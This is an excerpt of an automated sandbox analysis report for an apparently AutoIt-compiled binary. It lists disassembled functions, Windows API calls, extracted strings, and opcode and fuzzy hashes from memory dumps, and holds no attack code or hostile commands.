                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                        • Instruction ID: 97873a1bdb28c81fa3d5aa91743411406eba848387ce9bc44f27b604a14231e3
                                                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                        • Instruction Fuzzy Hash: 12C11A7220529349DF2EC63DC43043EFAA15AA27B931A63ADD4B7DF4C4FE24C564D520
                                                                                                                        Function 00E70A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                        • Instruction ID: 060535f26da09170d2d418563879f492315b74cdc3169594aecf9b3a604ce071
                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                        • Instruction Fuzzy Hash: CBC1E972205293CADF2EC639C43443EFBA15AA17B931AA76DD4BBEB0C4EE14C564D610
                                                                                                                        Function 00E70677 Relevance: .3, Instructions: 320COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 18a5d2373bc1dd009afe161c04f7601eb4228ec340a47daf722da42b04c1f80b
                                                                                                                        • Instruction ID: 780582fb1c5b12a327c1c80cfa9309721356c7a269fa27b04ad9def70132e10a
                                                                                                                        • Opcode Fuzzy Hash: 18a5d2373bc1dd009afe161c04f7601eb4228ec340a47daf722da42b04c1f80b
                                                                                                                        • Instruction Fuzzy Hash: 2AB1167220519389EF2EC639C43443EFBA15EE17B930AA35DD4BBEB1C5EE24D564C620
                                                                                                                        Function 00E708C9 Relevance: .1, Instructions: 146COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e20539652dcbd7c07b7d4df42e474eb4d7551a30f091f80a7773cc8d667f5a68
                                                                                                                        • Instruction ID: 3d5070c9efe9864cad336dbd55788b6e4e5fc2a5675ce67e0da9abc42901db2e
                                                                                                                        • Opcode Fuzzy Hash: e20539652dcbd7c07b7d4df42e474eb4d7551a30f091f80a7773cc8d667f5a68
                                                                                                                        • Instruction Fuzzy Hash: F451E77320529389EF1EC639C43043EFBA15AE17B931AA36DD4BBEB5C5EE14C564C610
                                                                                                                        Function 00EAA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAA7A5
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAA7B7
                                                                                                                        • DestroyWindow.USER32 ref: 00EAA7C5
                                                                                                                        • GetDesktopWindow.USER32 ref: 00EAA7DF
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00EAA7E6
                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00EAA927
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00EAA937
                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAA97F
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00EAA98B
                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EAA9C5
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAA9E7
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAA9FA
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAA05
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EAAA0E
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAA1D
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EAAA26
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAA2D
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EAAA38
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAA4A
                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00EDD9BC,00000000), ref: 00EAAA60
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EAAA70
                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00EAAA96
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00EAAAB5
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAAAD7
                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EAACC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                        • Opcode ID: 9826601dbf80eb2992ba419b60929d24806be71dd8fdaf2e9c7c461325c0a2d0
                                                                                                                        • Instruction ID: 5d1b07346182b79535abf3c5ce0f497bf34c2c2d9c8398aa743109daeeb24f06
                                                                                                                        • Opcode Fuzzy Hash: 9826601dbf80eb2992ba419b60929d24806be71dd8fdaf2e9c7c461325c0a2d0
                                                                                                                        • Instruction Fuzzy Hash: CF029C71900218EFDB14DF69DD88EAEBBB9FB49314F148169F915BB2A0C730AD05CB60
                                                                                                                        Function 00EBD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00EBD0EB
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EBD11C
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00EBD128
                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00EBD142
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EBD151
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EBD17C
                                                                                                                        • GetSysColor.USER32(00000010), ref: 00EBD184
                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00EBD18B
                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00EBD19A
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EBD1A1
                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00EBD1EC
                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 00EBD21E
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EBD249
                                                                                                                          • Part of subcall function 00EBD385: GetSysColor.USER32(00000012), ref: 00EBD3BE
                                                                                                                          • Part of subcall function 00EBD385: SetTextColor.GDI32(?,?), ref: 00EBD3C2
                                                                                                                          • Part of subcall function 00EBD385: GetSysColorBrush.USER32(0000000F), ref: 00EBD3D8
                                                                                                                          • Part of subcall function 00EBD385: GetSysColor.USER32(0000000F), ref: 00EBD3E3
                                                                                                                          • Part of subcall function 00EBD385: GetSysColor.USER32(00000011), ref: 00EBD400
                                                                                                                          • Part of subcall function 00EBD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EBD40E
                                                                                                                          • Part of subcall function 00EBD385: SelectObject.GDI32(?,00000000), ref: 00EBD41F
                                                                                                                          • Part of subcall function 00EBD385: SetBkColor.GDI32(?,00000000), ref: 00EBD428
                                                                                                                          • Part of subcall function 00EBD385: SelectObject.GDI32(?,?), ref: 00EBD435
                                                                                                                          • Part of subcall function 00EBD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00EBD454
                                                                                                                          • Part of subcall function 00EBD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EBD46B
                                                                                                                          • Part of subcall function 00EBD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00EBD480
                                                                                                                          • Part of subcall function 00EBD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EBD4A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521893082-0
                                                                                                                        • Opcode ID: 9dfacf6499a3f64c9179e3015a5b52d3363df42367490319d5a107b796133a8a
                                                                                                                        • Instruction ID: 217fee0bc62cb26d078c26d4558492494f24ff1694fe84739260b438829aa81e
                                                                                                                        • Opcode Fuzzy Hash: 9dfacf6499a3f64c9179e3015a5b52d3363df42367490319d5a107b796133a8a
                                                                                                                        • Instruction Fuzzy Hash: 7691907100E305EFC7119F65EC08EAB7BA9FF85324F101A1AF962A61E0D771D948CB51
                                                                                                                        Function 00EAA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00EAA42A
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EAA4E9
                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EAA527
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EAA539
                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EAA57F
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00EAA58B
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EAA5CF
                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EAA5DE
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00EAA5EE
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EAA5F2
                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EAA602
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EAA60B
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00EAA614
                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EAA642
                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EAA659
                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EAA694
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EAA6A8
                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EAA6B9
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EAA6E9
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00EAA6F4
                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EAA6FF
                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EAA709
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                        • Opcode ID: 4ff699bdad7d40eeddd97c6920cb08e3f3c03f721e2d644471c27ab53366e1ba
                                                                                                                        • Instruction ID: 1ed973a1393162c89a1771b7704d043abe3023e6a5493c298f521291fbdeb833
                                                                                                                        • Opcode Fuzzy Hash: 4ff699bdad7d40eeddd97c6920cb08e3f3c03f721e2d644471c27ab53366e1ba
                                                                                                                        • Instruction Fuzzy Hash: C6A16E71A41219BFEB14DBA5DD49FAE7BB9EB08714F018115FA14BB2E0D770AD04CB60
                                                                                                                        Function 00E9E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E9E45E
                                                                                                                        • GetDriveTypeW.KERNEL32(?,00EEDC88,?,\\.\,00EEDBF0), ref: 00E9E54B
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00EEDC88,?,\\.\,00EEDBF0), ref: 00E9E6B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                        • Opcode ID: d3e7bde9f7147d1f42495fb79d50246526a0a016ca5e38142bb42f7673da67b0
                                                                                                                        • Instruction ID: b5d9509afd082d0c0fbc42948f0ec8669e700d4feeb7ebe6e10a7be332446b39
                                                                                                                        • Opcode Fuzzy Hash: d3e7bde9f7147d1f42495fb79d50246526a0a016ca5e38142bb42f7673da67b0
                                                                                                                        • Instruction Fuzzy Hash: A551B630248301EBCB10DF14C8518A9B7D5BB98748B61A91AFA46F73D2D761DE45FB83
                                                                                                                        Function 00E5C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                        • Opcode ID: 9d40205e2d8b1dc0c6e41f8e2217488de7be1a6e2d82099e15329f2fe8179246
                                                                                                                        • Instruction ID: 6bcd6ce9a6aaf0733cc422ffa5ca049e1ccc4fa3f5975571470c005c7c85e74b
                                                                                                                        • Opcode Fuzzy Hash: 9d40205e2d8b1dc0c6e41f8e2217488de7be1a6e2d82099e15329f2fe8179246
                                                                                                                        • Instruction Fuzzy Hash: A4619C317443057FCB25AA349C52FBA33E8AF19745F247829FD15F61C2EB60DA06C6A1
                                                                                                                        Function 00EBC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00EBC598
                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00EBC64E
                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00EBC669
                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00EBC925
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                        • Opcode ID: edaedbc0ca67d89d4d7819aa4ac94a1b5b350431327635196c11e59738ce3c7d
                                                                                                                        • Instruction ID: abdcc521d4a7f8613dce601d63f73578d5479627d0d25ab38e26434792a5e5ea
                                                                                                                        • Opcode Fuzzy Hash: edaedbc0ca67d89d4d7819aa4ac94a1b5b350431327635196c11e59738ce3c7d
                                                                                                                        • Instruction Fuzzy Hash: C7F1BE7120D301AFE7158F24DC84BEBBBE4FB49358F281629F595E62A1C770D844DB92
                                                                                                                        Function 00EB6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,00EEDBF0), ref: 00EB6245
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                        • API String ID: 3964851224-45149045
                                                                                                                        • Opcode ID: 8d02f936672cac34bf14f6a61f1a9598905ff34624db68dda7e3fa56ec49e2c4
                                                                                                                        • Instruction ID: 8fc37e2721f951aa6d872651104351ba847caee39bf9089ad768a9cece71b537
                                                                                                                        • Opcode Fuzzy Hash: 8d02f936672cac34bf14f6a61f1a9598905ff34624db68dda7e3fa56ec49e2c4
                                                                                                                        • Instruction Fuzzy Hash: 58C1B3702043018BCB18EF14D451AAE77D2AF95394F146869F8967B2E7CB34ED4ADB82
                                                                                                                        Function 00EBD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000012), ref: 00EBD3BE
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00EBD3C2
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EBD3D8
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00EBD3E3
                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00EBD3E8
                                                                                                                        • GetSysColor.USER32(00000011), ref: 00EBD400
                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EBD40E
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EBD41F
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00EBD428
                                                                                                                        • SelectObject.GDI32(?,?), ref: 00EBD435
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EBD454
                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EBD46B
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EBD480
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EBD4A8
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EBD4CF
                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00EBD4ED
